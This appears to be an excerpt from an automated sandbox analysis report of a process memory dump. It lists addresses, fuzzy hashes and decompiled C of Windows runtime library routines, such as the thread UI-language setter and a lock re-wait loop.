0x01985cee
0x01985cb1
0x01985cb4
0x01985cb9
0x01985cbb
0x00000000
0x01985cbd
0x01985cbd
0x00000000
0x01985cbd
0x01985cbb
0x01942ab1
0x01942ab1
0x01942ac4
0x01942ac6
0x01942ac6
0x00000000
0x01942ac6
0x01942aab
0x00000000
0x01942a00
0x01942a09
0x01942a0e
0x01942a21
0x01942a24
0x01942a35
0x01942a3a
0x01942a3d
0x01942a42
0x01942a59
0x01942a59
0x01942a5c
0x01942a5f
0x01942a5f
0x019429fa
0x019429f3
0x01942a64
0x01942a64
0x01942a6b
0x01942a6b
0x01942a6d
0x01942a72
0x01942a72
0x00000000

Strings

PATH, xrefs: 01942642, 01942691

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: b42509fdbac7616cfaf6ae8c2f37c0d9ba9577ff4c25bd28ef7affba147ba116
Instruction ID: a06c66119e47c98459b1131a894f5a17471a3e27cc839b5467b669f705ff7c0d
Opcode Fuzzy Hash: b42509fdbac7616cfaf6ae8c2f37c0d9ba9577ff4c25bd28ef7affba147ba116
Instruction Fuzzy Hash: 3CC1BF75D00219EBDB25DF99E880EAEBBB5FF88740F054429F909BB250D734A942CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0194FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0194FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0192EEF0(0x1a07b60);
					_t134 =  *0x1a07b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1a07b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1a07b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01926D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E019276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E019B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0191B150();
													}
													_t116 = E019B6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E019275CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1a08638; // 0x0
																	_t122 = L019238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E019276E2(_t154);
																			goto L41;
																		}
																	} else {
																		E019276E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0194FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L019270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0194FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0194FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0194FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0194FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0194FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1a07b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1a07b84 = _t75;
						_t73 = E0192EB70(_t134, 0x1a07b60);
						if( *0x1a07b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0192FF60( *0x1a07b20);
							}
						}
						goto L5;
					}
				}
			}

0x0194fab0
0x0194fab2
0x0194fab3
0x0194fab4
0x0194fabc
0x0194fac0
0x0194fb14
0x0194fb17
0x0194fac2
0x0194fac8
0x0194facd
0x0194fad3
0x0194fad3
0x0194fadd
0x0194fb18
0x0194fb1b
0x0194fb1d
0x0194fb1e
0x0194fb1f
0x0194fb20
0x0194fb21
0x0194fb22
0x0194fb23
0x0194fb24
0x0194fb25
0x0194fb26
0x0194fb27
0x0194fb28
0x0194fb29
0x0194fb2a
0x0194fb2b
0x0194fb2c
0x0194fb2d
0x0194fb2e
0x0194fb2f
0x0194fb3a
0x0194fb3b
0x0194fb3e
0x0194fb41
0x0194fb44
0x0194fb47
0x0194fb4a
0x0194fb4d
0x0194fb53
0x0198bdcb
0x0198bdcb
0x0194fb59
0x0194fb5b
0x0194fb5b
0x0194fb5e
0x0198bdd5
0x0198bdd8
0x00000000
0x0198bdda
0x00000000
0x0198bdda
0x0194fb64
0x0194fb64
0x0194fb64
0x0194fb67
0x0194fb6e
0x0194fb70
0x0194fb72
0x00000000
0x0194fb78
0x0194fb7a
0x0194fb7a
0x0194fb7d
0x0194fb80
0x0198bddf
0x0198bde1
0x00000000
0x0198bde3
0x00000000
0x0198bde3
0x0194fb86
0x0194fb86
0x0194fb86
0x0194fb8b
0x0194fb90
0x0194fb92
0x0194fb94
0x0194fb9a
0x0194fb9b
0x0194fba1
0x0198bde8
0x0198bdeb
0x0198bded
0x0198beb5
0x0198beb5
0x0198bebb
0x0198bebd
0x0198bec3
0x0198bed2
0x0198bedd
0x0198bedd
0x0198beed
0x00000000
0x0198bdf3
0x0198bdfe
0x0198be06
0x0198be0b
0x0198be0d
0x0198be0f
0x0198be14
0x0198be19
0x0198be20
0x0198be25
0x0198be27
0x0198be35
0x0198be39
0x0198be46
0x0198be4f
0x0198be54
0x0198be56
0x0198bef8
0x0198bef8
0x00000000
0x0198be5c
0x0198be5c
0x0198be60
0x00000000
0x0198be66
0x0198be66
0x0198be7f
0x0198be84
0x0198be87
0x0198be89
0x0198be8b
0x0198be99
0x0198be9d
0x0198bea0
0x0198beac
0x0198beaf
0x0198beb1
0x0198beb3
0x0198beb3
0x00000000
0x0198bea2
0x0198bea2
0x00000000
0x0198bea2
0x0198be8d
0x0198be8d
0x0198be92
0x00000000
0x0198be92
0x0198be8b
0x0198be60
0x0198be3b
0x0198be3b
0x0198be3e
0x00000000
0x0198be40
0x0198be40
0x0198be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0198be44
0x0198be3e
0x0198be29
0x0198be29
0x00000000
0x0198be29
0x0198be27
0x00000000
0x0194fba7
0x0194fba7
0x0194fbab
0x0198bf02
0x0194fbb1
0x0194fbb1
0x0194fbb8
0x0194fbbd
0x0194fbbd
0x0194fbbf
0x0194fbbf
0x0194fbc5
0x0194fbcb
0x0194fbf8
0x0194fbf8
0x0194fbfa
0x00000000
0x0194fc00
0x0194fc00
0x0194fc03
0x00000000
0x0194fc09
0x0194fc09
0x0194fc0f
0x0194fc15
0x0194fc23
0x0194fc23
0x0194fc25
0x0194fc27
0x0194fc75
0x0194fc7c
0x0194fc84
0x00000000
0x0194fc29
0x0194fc29
0x0194fc2d
0x0194fc30
0x0198bf0f
0x00000000
0x0194fc36
0x0194fc38
0x0194fc3b
0x0194fc41
0x0198bf17
0x0198bf19
0x0198bf48
0x0198bf4b
0x00000000
0x0198bf1b
0x0198bf22
0x0198bf24
0x0198bf26
0x00000000
0x0198bf2c
0x0198bf37
0x0198bf39
0x0198bf3b
0x00000000
0x0198bf41
0x0198bf41
0x0198bf41
0x0198bf41
0x0198bf45
0x00000000
0x0198bf45
0x0198bf3b
0x0198bf26
0x00000000
0x0194fc47
0x0194fc47
0x0194fc49
0x0194fcb2
0x0194fcb4
0x0194fcb6
0x0194fcdc
0x0194fcdc
0x00000000
0x0194fcb8
0x0194fcc3
0x0194fcc5
0x0194fcc7
0x00000000
0x0194fcc9
0x0194fcc9
0x0194fccd
0x00000000
0x0194fccd
0x0194fcc7
0x00000000
0x0194fc4b
0x0194fc4b
0x0194fc4e
0x0194fc4e
0x0194fc51
0x0194fc51
0x0194fc54
0x0194fc5a
0x0194fc5c
0x0194fc5f
0x0194fc61
0x0194fc63
0x0194fc65
0x0194fc67
0x0194fc6e
0x0194fc72
0x0194fc72
0x0194fc72
0x0194fc72
0x0194fc67
0x0194fc61
0x00000000
0x0194fc5a
0x0194fc49
0x0194fc41
0x0194fc30
0x0194fc27
0x0194fc03
0x0194fbcd
0x0194fbd3
0x0194fbd9
0x0194fbdc
0x0194fbde
0x0194fc99
0x0194fc9b
0x0194fc9d
0x0194fcd5
0x0194fcd5
0x0194fc89
0x0194fc89
0x00000000
0x0194fc9f
0x0194fc9f
0x0194fca3
0x00000000
0x0194fca3
0x00000000
0x0194fbe4
0x0194fbe4
0x0194fbe4
0x0194fbe4
0x0194fbe9
0x0194fbf2
0x00000000
0x0194fbf2
0x0194fbde
0x0194fbcb
0x0194fbab
0x0194fc8b
0x0194fc8b
0x0194fc8c
0x0194fb80
0x0194fb72
0x0194fb5e
0x0194fc8d
0x0194fc91
0x0194fadf
0x0194fadf
0x0194fae1
0x0194fae4
0x0194fae7
0x0194faec
0x0194faf8
0x0194fb00
0x0194fb07
0x0194fb0f
0x0194fb0f
0x0194fb07
0x00000000
0x0194faf8
0x0194fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0198BE0F

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 92c445b1f4c4b7c26b0e5d06ffc3eb193aa9c3085336afa6a2f11146e4317a66
Instruction ID: b8911955830acf9216e94bd2980edea4ba65f6bc415414182dcd1f0d19a6386c
Opcode Fuzzy Hash: 92c445b1f4c4b7c26b0e5d06ffc3eb193aa9c3085336afa6a2f11146e4317a66
Instruction Fuzzy Hash: 82A11671B006078FEB26EF6CC450F7AB7A8AF45712F084569D94EDB681DB30E801CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01912D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01912D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1a05350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1a07bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E019597C0();
				}
				if( *0x1a079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1a079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01941624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01937D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E019AFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01959520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0194E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0196DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1a06901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1a06901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01959980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E019595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01937D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01937D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01997016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E019AFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1a05350;
							if(_t109 != 0x1a05350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E019AFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E019A5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01912d8a
0x01912d8a
0x01912d92
0x01912d96
0x01912d9e
0x01912da0
0x01912da3
0x01912da5
0x01912da8
0x01912dab
0x01912db2
0x0196f9aa
0x0196f9ab
0x0196f9ae
0x0196f9ae
0x01912db8
0x01912dc2
0x0196f9b9
0x0196f9be
0x0196f9bf
0x0196f9bf
0x01912dcf
0x0196f9c9
0x01912dd5
0x01912dd5
0x01912dd5
0x01912dde
0x01912de1
0x01912e70
0x01912e72
0x01912e72
0x01912de7
0x01912deb
0x01912e7c
0x01912e83
0x01912e85
0x01912e8b
0x01912e8d
0x01912e92
0x01912e92
0x01912e85
0x01912df1
0x01912df7
0x01912df9
0x01912df9
0x01912dfc
0x01912dff
0x01912e02
0x00000000
0x01912e05
0x01912e0c
0x0196f9d9
0x01912e12
0x01912e12
0x01912e12
0x01912e1a
0x0196f9e3
0x0196f9e9
0x0196f9f0
0x0196f9f6
0x0196f9f8
0x0196f9f8
0x0196f9f0
0x01912e23
0x0196fa02
0x0196fa03
0x0196fa05
0x0196fa06
0x00000000
0x01912e29
0x01912e29
0x01912e2e
0x01912e34
0x01912e3e
0x00000000
0x00000000
0x01912e44
0x01912e47
0x01912e4d
0x00000000
0x00000000
0x01912e4f
0x01912e54
0x00000000
0x00000000
0x01912e5a
0x01912e5f
0x01912e9a
0x01912ea4
0x01912ea5
0x01912ea8
0x01912eaf
0x01912eb2
0x01912eb5
0x0196fae9
0x0196faeb
0x0196faed
0x0196faef
0x0196faf7
0x0196faf8
0x0196fafd
0x0196faff
0x0196fb04
0x0196fb04
0x0196faff
0x01912ec0
0x01912ec4
0x01912ec6
0x01912ec8
0x0196fb14
0x0196fb18
0x0196fb1e
0x0196fb21
0x0196fb21
0x01912ece
0x01912ece
0x01912ece
0x01912ed7
0x01912e61
0x01912e63
0x0196fa6b
0x0196fa71
0x0196fa76
0x0196fa78
0x0196fa8a
0x0196fa7a
0x0196fa83
0x0196fa83
0x0196fa8f
0x0196fa91
0x0196fa97
0x0196fa9d
0x0196faa4
0x0196faaa
0x0196faaf
0x0196fab1
0x0196fac3
0x0196fab3
0x0196fabc
0x0196fabc
0x0196fac8
0x0196facb
0x0196fadf
0x0196fadf
0x0196facb
0x0196faa4
0x0196fa91
0x01912e6f
0x01912e6f
0x01912e5f
0x0196fa13
0x0196fa15
0x0196fa17
0x0196fa1f
0x0196fa21
0x0196fa22
0x0196fa25
0x0196fa28
0x0196fa2f
0x0196fa2f
0x0196fa2a
0x0196fa2a
0x0196fa2a
0x0196fa31
0x0196fa34
0x0196fa36
0x0196fa3c
0x0196fa3e
0x0196fa41
0x0196fa43
0x0196fa45
0x0196fa45
0x0196fa41
0x0196fa3c
0x0196fa4a
0x0196fa4f
0x0196fa51
0x0196fa53
0x0196fa56
0x0196fa5b
0x0196fa5e
0x00000000
0x0196fa5e
0x01912e23

Strings

RTL: Re-Waiting, xrefs: 0196FA4A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 316481f9cfb86405a2b6cbf12e3169f3d1837f7fa8e305ac18b8944bc77030e9
Instruction ID: b8877a3f63130cddf66cc1c775fd172a64a9b7085c0a6818f15e1fa9753969b4
Opcode Fuzzy Hash: 316481f9cfb86405a2b6cbf12e3169f3d1837f7fa8e305ac18b8944bc77030e9
Instruction Fuzzy Hash: DB617731A006099FEB32EF6CD854B7E7BEDEB80324F240669D91D972C1D734A981C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 019E0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E019E0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E019DFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E019E1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01959730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E019DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E019DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1a08b04 >> 0x14) + (_v44 -  *0x1a08b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01937D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E019D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01937D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E019CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1a08724 & 0x00000008) != 0) {
						E019D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E019E15B5(0x1a08ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x019e0eb7
0x019e0eb9
0x019e0ec0
0x019e0ec2
0x019e0ecd
0x019e105b
0x019e105b
0x019e1061
0x019e1066
0x019e1066
0x019e106b
0x019e1073
0x019e1073
0x019e0ed3
0x019e0ed6
0x019e0edc
0x019e0ee0
0x019e0ee7
0x019e0ef0
0x019e0ef5
0x019e0efa
0x019e0efc
0x019e0efd
0x019e0f03
0x019e0f04
0x019e0f06
0x019e0f07
0x019e0f09
0x019e0f0e
0x019e0f14
0x019e0f23
0x019e0f2d
0x019e0f34
0x019e0f34
0x019e0f14
0x019e0f52
0x00000000
0x00000000
0x019e0f58
0x019e0f73
